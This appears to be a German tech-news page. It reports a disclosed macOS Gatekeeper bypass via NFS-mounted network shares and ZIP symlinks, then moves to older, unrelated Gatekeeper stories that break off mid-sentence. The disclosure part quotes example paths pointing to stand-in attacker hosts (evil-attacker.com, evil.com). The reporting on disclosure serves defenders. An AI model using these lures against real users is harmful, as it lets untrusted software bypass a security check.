Ungestopfte Sicherheitslücke in macOS erlaubt das Umgehen des Gatekeepers
Der Sicherheitsexperte Filippo Cavallarin sorgte über das Wochenende für Aufsehen, indem er eine Schwachstelle im Gatekeeper von macOS öffentlich machte, mit der sich diese Sicherheitsfunktion umgehen lässt. Dies gilt auch nach dem in der vergangenen Woche veröffentlichten Update auf macOS 10.14.5. Zur Erinnerung: Der Gatekeeper sorgt in macOS dafür, dass aus dem Internet heruntergeladene Software unmittelbar auf ihre Herkunft geprüft und der Nutzer evtl. entsprechend gewarnt wird, sollte diese nicht vertrauenswürdig sein.
Laut Cavallarin kann diese Maßnahme jedoch komplett umgangen werden, was vor allem daran liegt, dass der Gatekeeper auch externe Festplatten und Netzlaufwerke pauschal als sichere Herkunftsorte einstuft. Dies bedeutet im Imkehrschluss, dass Software von diesen Orten nicht noch einmal auf ihre Sicherheit hin überprüft werden. Dem Sicherheitsforscher zufolge kann ein Nutzer jedoch relativ einfach in eine Falle gelockt werden, ein manipuliertes Netzlaufwerk zu mounten, von dem dann Software installiert werden kann, ohne dass der Gatekeeper hier eingreift.
So könnte mit dem Pfad "ls /net/evil-attacker.com/sharedfolder/" beispielsweise der Inhalt des Ordners "sharedfolder" auf einem entfernten Server mit der Adresse "evil-attacker.com" per NFS gemountet werden. Zudem können auch in ZIP-Archiven symbolische Links enthalten sein, die ebenfalls eine Möglichkeit bieten, den Gatekeeper zu umgehen. So könnte ein solcher Link beispielsweise auf "Documents -> /net/evil.com/Documents" lauten, wodurch sich der Nutzer nicht mehr auf seinem lokalen Rechner befände, sondern auf dem Ordner "Documents" auf dem Server von evil.com.
Cavallarin habe nach eigener Aussage Apple über die Sicherheitslücke am 22. Februar informiert und das Unternehmen wollte sie eigentlich mit mscOS 10.14.5 in der vergangenen Woche stopfen. Da das 90 Tage Fenster für die Geheimhaltung der Lücke inzwischen verstrichen ist und Apple auch nicht mehr auf E-Mails von Cavallarin reagiert, wurde sie nun öffentlich gemacht. Das nachfolgende Video zeigt sie in Aktion:
Auch Mac-Nutzer, die noch nicht auf Mountain Lion umgestiegen sind dürfen sich am heutigen Abend über ein Update freuen. Zwar wurde der Vorgänger OS X Lion im Juli abgelöst, heute schiebt Apple abder die vermutlich letzte Sicherheitsaktualisierung hinterher, die wie üblich allen Anwendern des Betriebssystems empfohlen wird. Die vielleicht wichtigste und interessanteste Neuerung in OS X 10.7.5 ist die von Mountain Lion bekannte neue Sicherheitsfunktion "Gatekeeper". Hierüber hat der Nutzer die Möglichkeit, festzulegen woher die Software stammen darf, die auf seinem Mac installiert wird. Dabei kann die Wahl entweder ausschließlich auf Software aus dem Mac App Store fallen, auf Software aus dem Mac App Store oder von durch Apple zertifizierte Entwicklern oder wie gehabt Software aus beliebiger Herkunft. Als weitere Inhalte in OS X 10.7.5 nennt Apple allgemeine Fehlerbehebungen, wie zum Beispiel die Behebung eines Problems mit mangelhafter Stabilität von WLAN-Verbindungen beim iMac oder auch eine sporadisch auftretende zufälliger Sortierung von App-Icons im Launchpad.
Während der Mac AppStore für so manchen User eine einfache und komfortable Möglichkeit ist, Software auf den Mac zu laden, werden die damit verbundenen Einschränkungen und Bedingungen für manchen Entwickler zum Ärgernis. Dies führt gar soweit, dass diverse, durchaus namhafte Entwickler ihre Apps inzwischen wieder aus dem AppStore entfernen und stattdessen wieder auf herkömmlichen Wege vertreiben. Mit dem am Mittwoch veröffentlichten OS X Mountain Lion und der darin enthaltenen Gatekeeper-Funktion dürfte sich diese Situation noch einmal verschärfen. Standardmäßig gestattet dieser nämlich ausschließlich die Installation von Apps aus dem AppStore, was für den Benutzer neben dem angesprochenen Komfort auch eine erhöhte Sicherheit vor Schadsoftware bietet. Dies liegt nicht zuletzt daran, dass Apple von Apps im Mac AppStore seit dem 01. Juni verlangt, dass diese in einer "Sandbox", also einem vom Rest des Betriebssystems abgeschotteten Bereich laufen. Und genau hierin liegt für viele Entwickler das Problem. Innerhalb der Sandbox besitzen die Apps nur begrenzte Rechte, was unter anderem dazu geführt hat, dass beispielsweise Postbox, Anbieter einer E-Mail-Software, seine Apps wieder